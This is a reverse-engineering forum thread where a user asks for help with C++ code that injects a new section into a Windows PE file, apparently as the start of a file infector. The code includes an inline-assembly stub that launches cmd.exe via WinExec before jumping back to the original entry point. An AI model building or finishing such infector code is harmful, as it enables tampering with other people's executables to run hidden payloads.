Jump to content
View in the app

A better way to browse. Learn more.
Tuts 4 You

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Problem with PE section Injection

DarkInjection
DarkInjection
in Programming and Coding

Featured Replies

Posted

hello this is my first post here :)

i m writing a program to add a new section into the PE at the moment....

but somegthing goes wrong im trying to locate what its worng but nothing yet

u can find the source here:

infection.h

typedef struct _StaffToUse
{
	DWORD EIP;
	DWORD IMAGE_BASE;
	DWORD VEP;	DWORD NumbOfSections;
	DWORD WinExec_;
	DWORD LoadLib_;
	DWORD ExitProc_;
	DWORD *VirtualS[32];
	DWORD *SizeOfRaw[32];
	DWORD *PointerToRaw[32];
	DWORD *VirtualAddr[32];
	BYTE *SectionNames[32];} StaffToUse;typedef struct _DWDataStorage{	BYTE *dwData;}DWDataStorage;//cracps
HANDLE hFile,oFile = NULL;
DWORD dwBytesRead;
DWORD Sections;
DWORD fSize = 0;
PCHAR pMem;
IMAGE_NT_HEADERS  _nt;
DWDataStorage dw_[32];
IMAGE_DOS_HEADER header;
IMAGE_SECTION_HEADER *_img;
IMAGE_SECTION_HEADER _img_[32];
StaffToUse _help_my_ass;
PIMAGE_SECTION_HEADER Custom_hdr;
BYTE *ptrBuffer;
DWORD stub_size;
BYTE *stub;

//

main.cpp

//

#include <stdio.h>
#include <windows.h>
#include "infection.h"//yodap code .......................................................
DWORD PEAlign(DWORD dwTarNum,DWORD dwAlignTo){		return(((dwTarNum+dwAlignTo-1)/dwAlignTo)*dwAlignTo);
}
//...................................................................void CmdLoader(){
	//cmd shell
		__asm{			pushad
			pushfd			xor		eax,	eax
			xor		ecx,	ecx			mov		dword	ptr[ebp-15],0x63
			mov		dword	ptr[ebp-14],0x6d
			mov		dword	ptr[ebp-13],0x64
			mov		dword	ptr[ebp-12],0x2e
			mov		dword	ptr[ebp-11],0x65
			mov		dword	ptr[ebp-10],0x78
			mov		dword	ptr[ebp-9],0x65
			mov		dword	ptr[ebp-8],0x00			push	0x1
			lea		eax,	[ebp-15]
			push	eax
			mov		ecx,	_help_my_ass.WinExec_
			call	ecx			mov		eax,	_help_my_ass.VEP			jmp		eax		};		//soon more payloads....		//....................
}void AddNewSection(char* szName,DWORD dwSize)
{
	DWORD roffset,rsize,voffset,vsize;	int i=_nt.FileHeader.NumberOfSections;
	//yodap code............................................................................
................
	rsize=PEAlign(dwSize,_nt.OptionalHeader.FileAlignment);	vsize=PEAlign(rsize,_nt.OptionalHeader.SectionAlignment);	roffset=PEAlign(_img_[i-1].PointerToRawData+_img_[i-1].SizeOfRawData,_nt.OptionalHeader.FileAlignment);	voffset=PEAlign(_img_[i-1].VirtualAddress+_img_[i-1].Misc.VirtualSize,_nt.OptionalHeader.SectionAlignment);
	//-------------------------------------------------------------------------------------------------------	_img_[i].PointerToRawData=roffset;
	_img_[i].VirtualAddress=voffset;
	_img_[i].SizeOfRawData=rsize;
	_img_[i].Misc.VirtualSize=vsize;
	_img_[i].Characteristics=0xC0000040;	memcpy(_img_[i].Name,szName,(size_t)strlen(szName));	_nt.FileHeader.NumberOfSections++;	//memcpy(&Custom_hdr,&_img_[i],sizeof(_img_[i]));}int readFileHeaders(char*file){	hFile =	CreateFile( file,GENERIC_READ,FILE_SHARE_WRITE | FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);	if(hFile == INVALID_HANDLE_VALUE){		MessageBoxA(0,"File Not Found","Error",MB_ICONEXCLAMATION|MB_OK);
		return 0;	}	fSize = GetFileSize(hFile,NULL);	if(fSize <= 60 ){
		MessageBoxA(0,"File Size Error","Error",MB_ICONEXCLAMATION|MB_OK);		return 0;	}else{		ptrBuffer = (BYTE*)malloc(fSize+1);	}	//read the file
	ReadFile( hFile, ptrBuffer, fSize, &dwBytesRead, NULL );	if(dwBytesRead != fSize){		MessageBoxA(0,"Read Size Error","Error",MB_ICONEXCLAMATION|MB_OK);		return 0;	}	//copy the dos header
	memcpy(&header, ptrBuffer, sizeof(IMAGE_DOS_HEADER)); 	stub_size = header.e_lfanew - sizeof(IMAGE_DOS_HEADER);	stub = (BYTE*)malloc(stub_size);	memcpy(stub,ptrBuffer+ sizeof(IMAGE_DOS_HEADER),stub_size);	if(header.e_magic != IMAGE_DOS_SIGNATURE){		MessageBoxA(0,"Not A Valid Dos Stub","Error",MB_ICONEXCLAMATION|MB_OK);		return 0;	};
	//copy the pe header
	memcpy(&_nt,ptrBuffer + header.e_lfanew,sizeof(IMAGE_NT_HEADERS));	if(_nt.Signature != IMAGE_NT_SIGNATURE){		MessageBoxA(0,"Not A Valid PE Executable","Error",MB_ICONEXCLAMATION|MB_OK);		return 0;
	}
	//place **** to my structure
	_help_my_ass.EIP = _nt.OptionalHeader.AddressOfEntryPoint;
	_help_my_ass.IMAGE_BASE = _nt.OptionalHeader.ImageBase;
	_help_my_ass.VEP = _nt.OptionalHeader.AddressOfEntryPoint + _nt.OptionalHeader.ImageBase;
	//read the sections
	Sections = _nt.FileHeader.NumberOfSections;
	_help_my_ass.NumbOfSections = Sections;
	//fill the image section structure
	_img = (IMAGE_SECTION_HEADER *)(ptrBuffer + header.e_lfanew+sizeof(IMAGE_NT_HEADERS));	if( (Sections < 1) || (Sections > 32) ){		MessageBoxA(0,"Error With File Sections","Error",MB_ICONEXCLAMATION|MB_OK);		return 0;	}	for(DWORD i=0; i<= Sections-1; i++){		memcpy(&_img_[i],_img,sizeof(IMAGE_SECTION_HEADER));
		_help_my_ass.SectionNames[i] = _img_[i].Name;
		_help_my_ass.PointerToRaw[i] = (unsigned long*)_img_[i].PointerToRawData;
		_help_my_ass.SizeOfRaw[i] = (unsigned long*)_img_[i].SizeOfRawData;
		_help_my_ass.VirtualAddr[i] = (unsigned long*)_img_[i].VirtualAddress;
		_help_my_ass.VirtualS[i] =(unsigned long*) _img_[i].Misc.VirtualSize;
		//allocate memory to store the datas from each section
		DWORD size_to  = PEAlign(_img_[i].SizeOfRawData,_nt.OptionalHeader.FileAlignment);
		dw_[i].dwData = (BYTE*)malloc(size_to);
		//copy them
		memcpy(dw_[i].dwData,ptrBuffer+_img_[i].PointerToRawData,_img_[i].SizeOfRawData);
		_img++;
	}	return 1;
}int main(){
	char *_file = "c:\\windows\\system32\\cmd.exe";
	DWORD i;	_help_my_ass.WinExec_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"WinExec");
	_help_my_ass.LoadLib_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"LoadLibrary");
	_help_my_ass.ExitProc_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"ExitProcess");	readFileHeaders(_file);	printf("Current EIP :%x\n",_help_my_ass.EIP);	//_nt.OptionalHeader.AddressOfEntryPoint = 0x01ffff;	pMem = (char*)malloc(fSize);	memcpy(pMem,&header,sizeof(IMAGE_DOS_HEADER));	oFile = CreateFile("output.exe",
					 GENERIC_WRITE,
					 FILE_SHARE_WRITE | FILE_SHARE_READ,
					 NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);	//write the DOS HEADER
	WriteFile(oFile,pMem,sizeof(IMAGE_DOS_HEADER),&dwBytesRead,NULL);
	//write the stub junk****
	WriteFile(oFile,stub,stub_size,&dwBytesRead,NULL);
	//Make New Section
	AddNewSection(".injct",0x22400);
	//Write NT HEADER
	memcpy(pMem,&_nt,sizeof(IMAGE_NT_HEADERS));
	WriteFile(oFile,pMem,sizeof(IMAGE_NT_HEADERS),&dwBytesRead,NULL);	//write the sections
	for(i=0; i<=Sections;i++){		memcpy(pMem,&_img_[i],sizeof(IMAGE_SECTION_HEADER));
		WriteFile(oFile,pMem,sizeof(IMAGE_SECTION_HEADER),&dwBytesRead,NULL);
	}
	//write sections data	for(i=0; i<=Sections-1; i++){
		memcpy(pMem,dw_[i].dwData,_img_[i].SizeOfRawData);		WriteFile(oFile,pMem,_img_[i].SizeOfRawData,&dwBytesRead,NULL);	}	//write data for the new section later	return 0;
}

that source generates a wrong executable file instead of make a correct one

any help will be gr8full :)

  • Author

anyway i fix that :)

  • 2 weeks later...

Can you attach a before and after exe to compare?

Hi.

Looking at this purely from a coders perspective, if someone came looking for help with adding a section to a PE file and their problem has a similar cause/effect, they might benefit from the information you can provide about why your code was wrong and how you fixed it.

Plus its only fair (imho) that when you are prepared to ask for help with a coding/rce situation, you should also be prepared to help if you can and sometimes this is as simple as sharing the fix to your woes.

HR.

Ghandi

Hi, can you post full source here?

Thanks

Create an account or sign in to comment

Go to topic listing

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.